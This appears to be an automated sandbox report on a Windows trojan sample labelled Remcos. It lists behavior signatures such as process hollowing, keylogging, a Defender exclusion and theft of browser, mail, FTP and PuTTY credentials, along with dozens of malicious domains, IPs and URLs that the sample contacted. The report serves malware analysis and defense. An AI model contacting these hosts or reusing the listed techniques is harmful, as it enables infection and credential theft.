                    Security Software Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job21
                    Registry Run Keys / Startup Folder                    		432
                    Masquerading                    		Proc Filesystem151
                    Virtualization/Sandbox Evasion                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                    Valid Accounts                    		/etc/passwd and /etc/shadow2
                    Process Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                    Access Token Manipulation                    		Network Sniffing1
                    Application Window Discovery                    		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd151
                    Virtualization/Sandbox Evasion                    		Input Capture1
                    System Owner/User Discovery                    		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                    Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task311
                    Process Injection                    		Keylogging1
                    System Network Configuration Discovery                    		Taint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1562865 Sample: C6dAUcOA6M.exe Startdate: 26/11/2024 Architecture: WINDOWS Score: 100 114 zlenh.biz 2->114 116 zjbpaao.biz 2->116 118 61 other IPs or domains 2->118 130 Multi AV Scanner detection for domain / URL 2->130 132 Suricata IDS alerts for network traffic 2->132 134 Found malware configuration 2->134 136 18 other signatures 2->136 10 alg.exe 2->10         started        15 C6dAUcOA6M.exe 1 7 2->15         started        17 Juqmtmya.PIF 2->17         started        19 7 other processes 2->19 signatures3 process4 dnsIp5 120 lpuegx.biz 82.112.184.197, 49814, 49867, 49871 FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRU Russian Federation 10->120 122 qpnczch.biz 18.246.231.120, 50055, 50065, 50077 AMAZON-02US United States 10->122 126 12 other IPs or domains 10->126 92 C:\Program Files\...\updater.exe, PE32+ 10->92 dropped 94 C:\Program Files\...\private_browsing.exe, PE32+ 10->94 dropped 96 C:\Program Files\...\plugin-container.exe, PE32+ 10->96 dropped 106 125 other malicious files 10->106 dropped 170 Creates files in the system32 config directory 10->170 172 Drops executable to a common third party application directory 10->172 174 Infects executable files (exe, dll, sys, html) 10->174 124 gxe0.com 198.252.105.91, 443, 49707, 49708 HAWKHOSTCA Canada 15->124 98 C:\Users\Public\Libraries\aymtmquJ.pif, PE32 15->98 dropped 100 C:\Users\Public\Libraries\aymtmquJ.cmd, DOS 15->100 dropped 102 C:\Users\Public\Libraries\Juqmtmya, data 15->102 dropped 104 C:\Users\Public\Juqmtmya.url, MS 15->104 dropped 176 Drops PE files with a suspicious file extension 15->176 178 Writes to foreign memory regions 15->178 180 Allocates memory in foreign processes 15->180 182 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 15->182 21 aymtmquJ.pif 4 15->21         started        25 cmd.exe 1 15->25         started        27 esentutl.exe 2 15->27         started        184 Sample uses process hollowing technique 17->184 29 aymtmquJ.pif 17->29         started        31 aymtmquJ.pif 19->31         started        file6 signatures7 process8 file9 84 C:\Users\user\AppData\...\Trading_AIBot.exe, PE32 21->84 dropped 86 C:\Users\user\...86ative_neworigin.exe, PE32 21->86 dropped 88 C:\Program Files (x86)\...\armsvc.exe, PE32 21->88 dropped 164 Drops executable to a common third party application directory 21->164 166 Infects executable files (exe, dll, sys, html) 21->166 33 Native_neworigin.exe 15 2 21->33         started        38 Trading_AIBot.exe 21->38         started        40 esentutl.exe 2 25->40         started        52 8 other processes 25->52 90 C:\Users\Public\Libraries\Juqmtmya.PIF, PE32 27->90 dropped 42 conhost.exe 27->42         started        44 Native_neworigin.exe 29->44         started        46 Trading_AIBot.exe 29->46         started        48 Native_neworigin.exe 31->48         started        50 Trading_AIBot.exe 31->50         started        signatures10 process11 dnsIp12 108 s82.gocheapweb.com 51.195.88.199, 49774, 49845, 49866 OVHFR France 33->108 110 acwjcqqv.biz 18.141.10.107, 49757, 49764, 49790 AMAZON-02US United States 33->110 112 4 other IPs or domains 33->112 70 C:\Windows\System32\alg.exe, PE32+ 33->70 dropped 72 C:\Windows\System32\FXSSVC.exe, PE32+ 33->72 dropped 74 DiagnosticsHub.Sta...llector.Service.exe, PE32+ 33->74 dropped 82 3 other malicious files 33->82 dropped 138 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 33->138 140 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 33->140 142 Tries to steal Mail credentials (via file / registry access) 33->142 144 Infects executable files (exe, dll, sys, html) 33->144 76 C:\Users\user\AppData\Roaming\...\apihost.exe, PE32 38->76 dropped 146 Uses schtasks.exe or at.exe to add and modify task schedules 38->146 148 Drops large PE files 38->148 150 Adds a directory exclusion to Windows Defender 38->150 54 powershell.exe 38->54         started        57 schtasks.exe 38->57         started        59 apihost.exe 38->59         started        78 C:\Users\Public\alpha.pif, PE32 40->78 dropped 152 Drops PE files to the user root directory 40->152 154 Drops PE files with a suspicious file extension 40->154 156 Drops or copies cmd.exe with a different name (likely to bypass HIPS) 40->156 158 Tries to harvest and steal ftp login credentials 44->158 160 Tries to harvest and steal browser information (history, passwords, etc) 44->160 162 Installs a global keyboard hook 44->162 80 C:\Users\Public\xpha.pif, PE32 52->80 dropped 61 xpha.pif 52->61         started        file13 signatures14 process15 dnsIp16 168 Loading BitLocker PowerShell Module 54->168 64 conhost.exe 54->64         started        66 WmiPrvSE.exe 54->66         started        68 conhost.exe 57->68         started        128 127.0.0.1 unknown unknown 61->128 signatures17 process18

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    C6dAUcOA6M.exe63%ReversingLabsWin32.Trojan.Remcos
                    C6dAUcOA6M.exe62%VirustotalBrowse
                    C6dAUcOA6M.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\AutoIt3\Au3Check.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\AutoIt3\Au3Info.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateuserer.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe100%AviraW32/Infector.Gen
                    C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\AutoIt3\Au3Check.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\AutoIt3\Au3Info.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateuserer.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe100%Joe Sandbox ML

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    SourceDetectionScannerLabelLink
                    deoci.biz15%VirustotalBrowse
                    nqwjmb.biz14%VirustotalBrowse
                    wllvnzb.biz14%VirustotalBrowse
                    dwrqljrr.biz16%VirustotalBrowse

                    URLs

                    No Antivirus matches

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    uaafd.biz
                    		3.254.94.185
                    		truefalse
                      vjaxhpbji.biz
                      		82.112.184.197
                      		truetrue
                        pywolwnvd.biz
                        		54.244.188.177
                        		truetrue
                          s82.gocheapweb.com
                          		51.195.88.199
                          		truetrue
                            ytctnunms.biz
                            		3.94.10.34
                            		truefalse
                              lrxdmhrr.biz
                              		54.244.188.177
                              		truetrue
                                vrrazpdh.biz
                                		34.211.97.45
                                		truefalse
                                  tbjrpv.biz
                                  		34.246.200.160
                                  		truefalse
                                    hehckyov.biz
                                    		44.221.84.105
                                    		truefalse
                                      xlfhhhm.biz
                                      		47.129.31.212
                                      		truefalse
                                        warkcdu.biz
                                        		18.141.10.107
                                        		truetrue
                                          npukfztj.biz
                                          		44.221.84.105
                                          		truefalse
                                            sxmiywsfv.biz
                                            		13.251.16.150
                                            		truefalse
                                              przvgke.biz
                                              		172.234.222.143
                                              		truefalse
                                                dwrqljrr.biz
                                                		54.244.188.177
                                                		truetrue
                                                gytujflc.biz
                                                		208.100.26.245
                                                		truefalse
                                                  gvijgjwkh.biz
                                                  		3.94.10.34
                                                  		truefalse
                                                    gnqgo.biz
                                                    		18.208.156.248
                                                    		truefalse
                                                      deoci.biz
                                                      		18.208.156.248
                                                      		truefalse
                                                      iuzpxe.biz
                                                      		13.251.16.150
                                                      		truefalse
                                                        nqwjmb.biz
                                                        		35.164.78.200
                                                        		truefalse
                                                        wllvnzb.biz
                                                        		18.141.10.107
                                                        		truetrue
                                                        cvgrf.biz
                                                        		54.244.188.177
                                                        		truetrue
                                                          lpuegx.biz
                                                          		82.112.184.197
                                                          		truetrue
                                                            gxe0.com
                                                            		198.252.105.91
                                                            		truetrue
                                                              bumxkqgxu.biz
                                                              		44.221.84.105
                                                              		truefalse
                                                                yhqqc.biz
                                                                		34.211.97.45
                                                                		truefalse
                                                                  api.ipify.org
                                                                  		104.26.13.205
                                                                  		truefalse
                                                                    vcddkls.biz
                                                                    		18.141.10.107
                                                                    		truetrue
                                                                      vyome.biz
                                                                      		18.246.231.120
                                                                      		truetrue
                                                                        dlynankz.biz
                                                                        		85.214.228.140
                                                                        		truefalse
                                                                          gcedd.biz
                                                                          		13.251.16.150
                                                                          		truefalse
                                                                            xccjj.biz
                                                                            		18.246.231.120
                                                                            		truetrue
                                                                              oshhkdluh.biz
                                                                              		54.244.188.177
                                                                              		truetrue
                                                                                opowhhece.biz
                                                                                		18.208.156.248
                                                                                		truefalse
                                                                                  jwkoeoqns.biz
                                                                                  		18.208.156.248
                                                                                  		truefalse
                                                                                    jpskm.biz
                                                                                    		34.211.97.45
                                                                                    		truefalse
                                                                                      ftxlah.biz
                                                                                      		47.129.31.212
                                                                                      		truefalse
                                                                                        ifsaia.biz
                                                                                        		13.251.16.150
                                                                                        		truefalse
                                                                                          s-part-0035.t-0009.t-msedge.net
                                                                                          		13.107.246.63
                                                                                          		truefalse
                                                                                            rynmcq.biz
                                                                                            		54.244.188.177
                                                                                            		truetrue
                                                                                              oflybfv.biz
                                                                                              		47.129.31.212
                                                                                              		truefalse
                                                                                                jhvzpcfg.biz
                                                                                                		44.221.84.105
                                                                                                		truefalse
                                                                                                  saytjshyf.biz
                                                                                                  		44.221.84.105
                                                                                                  		truefalse
                                                                                                    fwiwk.biz
                                                                                                    		172.234.222.138
                                                                                                    		truefalse
                                                                                                      typgfhb.biz
                                                                                                      		13.251.16.150
                                                                                                      		truefalse
                                                                                                        esuzf.biz
                                                                                                        		34.211.97.45
                                                                                                        		truefalse
                                                                                                          myups.biz
                                                                                                          		165.160.15.20
                                                                                                          		truefalse
                                                                                                            yauexmxk.biz
                                                                                                            		18.208.156.248
                                                                                                            		truefalse
                                                                                                              ssbzmoy.biz
                                                                                                              		18.141.10.107
                                                                                                              		truetrue
                                                                                                                knjghuig.biz
                                                                                                                		18.141.10.107
                                                                                                                		truetrue
                                                                                                                  yunalwv.biz
                                                                                                                  		208.100.26.245
                                                                                                                  		truefalse
                                                                                                                    brsua.biz
                                                                                                                    		3.254.94.185
                                                                                                                    		truefalse
                                                                                                                      mgmsclkyu.biz
                                                                                                                      		34.246.200.160
                                                                                                                      		truefalse
                                                                                                                        qaynky.biz
                                                                                                                        		13.251.16.150
                                                                                                                        		truefalse
                                                                                                                          qpnczch.biz
                                                                                                                          		18.246.231.120
                                                                                                                          		truetrue
                                                                                                                            mnjmhp.biz
                                                                                                                            		47.129.31.212
                                                                                                                            		truefalse
                                                                                                                              acwjcqqv.biz
                                                                                                                              		18.141.10.107
                                                                                                                              		truetrue
                                                                                                                                jdhhbs.biz
                                                                                                                                		13.251.16.150
                                                                                                                                		truefalse
                                                                                                                                  anpmnmxo.biz
                                                                                                                                  		unknown
                                                                                                                                  		unknowntrue
                                                                                                                                    zjbpaao.biz
                                                                                                                                    		unknown
                                                                                                                                    		unknowntrue
                                                                                                                                      uhxqin.biz
                                                                                                                                      		unknown
                                                                                                                                      		unknowntrue
                                                                                                                                        zlenh.biz
                                                                                                                                        		unknown
                                                                                                                                        		unknowntrue
                                                                                                                                          lejtdj.biz
                                                                                                                                          		unknown
                                                                                                                                          		unknowntrue

                                                                                                                                            Contacted URLs

                                                                                                                                            NameMaliciousAntivirus DetectionReputation
                                                                                                                                            http://bumxkqgxu.biz/ifsivywgppfalse
                                                                                                                                              http://warkcdu.biz/kctrue
                                                                                                                                                http://acwjcqqv.biz/ljnnvokactrue
                                                                                                                                                  http://ytctnunms.biz/anxrplnvdvpxnfalse
                                                                                                                                                    http://gnqgo.biz/torfblebfalse
                                                                                                                                                      http://vcddkls.biz/udjkgjnyfcxmpggxtrue
                                                                                                                                                        http://yhqqc.biz/binfxyplqyoumyfalse
                                                                                                                                                          http://dlynankz.biz/fuqbdfcowfalse
                                                                                                                                                            http://lpuegx.biz/nbnssijhjwmuglatrue
                                                                                                                                                              http://xccjj.biz/rntyadtrue
                                                                                                                                                                http://yhqqc.biz/tgphsmbcvwmuwmjfalse
                                                                                                                                                                  http://sxmiywsfv.biz/vtkfalse
                                                                                                                                                                    http://fwiwk.biz/opshcknhcxfalse
                                                                                                                                                                      http://xlfhhhm.biz/ijfjrofalse
                                                                                                                                                                        http://gcedd.biz/onutmfalse
                                                                                                                                                                          http://tbjrpv.biz/cmdgaowbfalse
                                                                                                                                                                            http://qpnczch.biz/htrue
                                                                                                                                                                              http://yunalwv.biz/sltbypkjutmqdfalse
                                                                                                                                                                                http://rynmcq.biz/qqnjtrue
                                                                                                                                                                                  http://yauexmxk.biz/dqpyguefalse
                                                                                                                                                                                    http://lpuegx.biz/ccxtrue
                                                                                                                                                                                      http://saytjshyf.biz/hdfjfalse
                                                                                                                                                                                        http://gvijgjwkh.biz/txfroxnfrjfalse
                                                                                                                                                                                          http://gytujflc.biz/mqrfuyvbhtbnfalse
                                                                                                                                                                                            http://gnqgo.biz/twvfalse
                                                                                                                                                                                              http://saytjshyf.biz/wtfalse
                                                                                                                                                                                                http://xlfhhhm.biz/ihrtfcsjfalse
                                                                                                                                                                                                  http://esuzf.biz/vjfalse
                                                                                                                                                                                                    http://knjghuig.biz/wofnqkoxvbviggtrue
                                                                                                                                                                                                      http://yunalwv.biz/iqacwcupavovvfalse
                                                                                                                                                                                                        http://jdhhbs.biz/bfalse
                                                                                                                                                                                                          http://deoci.biz/dvsybtniklyfalse
                                                                                                                                                                                                            http://myups.biz/omaxykiwlgfalse
                                                                                                                                                                                                              http://vcddkls.biz/wxdopktrue
                                                                                                                                                                                                                http://vrrazpdh.biz/wmyvrothcgfalse
                                                                                                                                                                                                                  http://vjaxhpbji.biz/pgakntaoeptrue
                                                                                                                                                                                                                    http://ftxlah.biz/ubrpiugbcifalse
                                                                                                                                                                                                                      http://mnjmhp.biz/dqxhnesyynafalse
                                                                                                                                                                                                                        http://przvgke.biz/fafjfalse
                                                                                                                                                                                                                          http://oshhkdluh.biz/mvjuawquortrue
                                                                                                                                                                                                                            http://lpuegx.biz/hpkejgwwxdptrue
                                                                                                                                                                                                                              http://ifsaia.biz/kqhlsuvrfalse
                                                                                                                                                                                                                                http://gvijgjwkh.biz/yfalse
                                                                                                                                                                                                                                  http://typgfhb.biz/yfqsbafalse
                                                                                                                                                                                                                                    http://yauexmxk.biz/negfyndqatfalse
                                                                                                                                                                                                                                      https://gxe0.com/yak2/233_Juqmtmyadyytrue
                                                                                                                                                                                                                                        http://przvgke.biz/kgrfegimyuttfalse
                                                                                                                                                                                                                                          http://pywolwnvd.biz/tkvpxcpexicoatrue
                                                                                                                                                                                                                                            http://wllvnzb.biz/gerofbpnhxbneltrue
                                                                                                                                                                                                                                              http://ssbzmoy.biz/bmgwtyytrue
                                                                                                                                                                                                                                                http://mgmsclkyu.biz/tfalse
                                                                                                                                                                                                                                                  http://ytctnunms.biz/qkmbmbtlinurxafalse
                                                                                                                                                                                                                                                    https://api.ipify.org/false
                                                                                                                                                                                                                                                      http://gytujflc.biz/mhnfavogqkpfalse
                                                                                                                                                                                                                                                        http://deoci.biz/tipcpxgsfalse
                                                                                                                                                                                                                                                          http://vrrazpdh.biz/jsmhknoucgibfalse
                                                                                                                                                                                                                                                            http://brsua.biz/dgxlfefuhlecfalse
                                                                                                                                                                                                                                                              http://oflybfv.biz/dafungtdefalse
                                                                                                                                                                                                                                                                http://vjaxhpbji.biz/dhyyqtllpdwrtrue
                                                                                                                                                                                                                                                                  http://qaynky.biz/fqwxffalse
                                                                                                                                                                                                                                                                    http://hehckyov.biz/isfkmckmfalse
                                                                                                                                                                                                                                                                      http://bumxkqgxu.biz/xqvmgfalse
                                                                                                                                                                                                                                                                        http://acwjcqqv.biz/rmutrue
                                                                                                                                                                                                                                                                          http://gcedd.biz/rwfalse

                                                                                                                                                                                                                                                                            URLs from Memory and Binaries

                                                                                                                                                                                                                                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                                                                                            http://172.234.222.143/mbuecNative_neworigin.exe, 0000000D.00000002.1778812791.000000000537B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                              http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                http://18.141.10.107/nkbiquvNative_neworigin.exe, 0000000D.00000002.1778812791.000000000537B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                  http://82.112.184.197/aalg.exe, 00000011.00000003.2641931350.000000000063F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                    http://82.112.184.197/dalg.exe, 00000011.00000003.2641931350.000000000063F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                      http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                        http://18.141.10.107/1Native_neworigin.exe, 0000000D.00000002.1667563278.00000000007FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                          http://82.112.184.197/salg.exe, 00000011.00000003.2641931350.000000000063F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                            http://172.234.222.143/kgrfegimyutt~Native_neworigin.exe, 0000000D.00000002.1778812791.000000000537B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                              http://172.234.2INative_neworigin.exe, 0000000D.00000002.1778812791.00000000053C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                https://nuget.org/nuget.exepowershell.exe, 00000012.00000002.1734942453.000000000525A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameNative_neworigin.exe, 0000000D.00000002.1720541444.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000012.00000002.1630809975.0000000004345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000012.00000002.1630809975.0000000004345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                        http://82.112.184.197:80/btnkoeanfymxsstkbatalg.exe, 00000011.00000003.2641931350.0000000000659000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                          https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881118.0.1alg.exe, 00000011.00000003.2537698906.0000000000BB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                            https://contoso.com/Iconpowershell.exe, 00000012.00000002.1734942453.000000000525A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                              https://api.ipify.org/tNative_neworigin.exe, 0000000D.00000002.1720541444.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                https://github.com/Pester/Pesterpowershell.exe, 00000012.00000002.1630809975.0000000004345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                  http://18.141.10.107/qmpyCNative_neworigin.exe, 0000000D.00000002.1667563278.000000000077A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                    http://r11.i.lencr.org/0Native_neworigin.exe, 0000000D.00000002.1720541444.0000000002F3A000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1778812791.000000000537B000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1667563278.00000000007AF000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1789264560.0000000006AE4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                      http://18.141.10.107/aatpwqmmnwrfjmalg.exe, 00000011.00000003.1712152929.0000000000678000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000012.00000002.1630809975.0000000004345000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                          http://82.112.184.197/hrkmkabalg.exe, 00000011.00000003.2633384477.0000000000678000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2410341370.0000000000676000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2177399665.0000000000678000.00000004.00000020.00020000.00000000.sdmpfalse
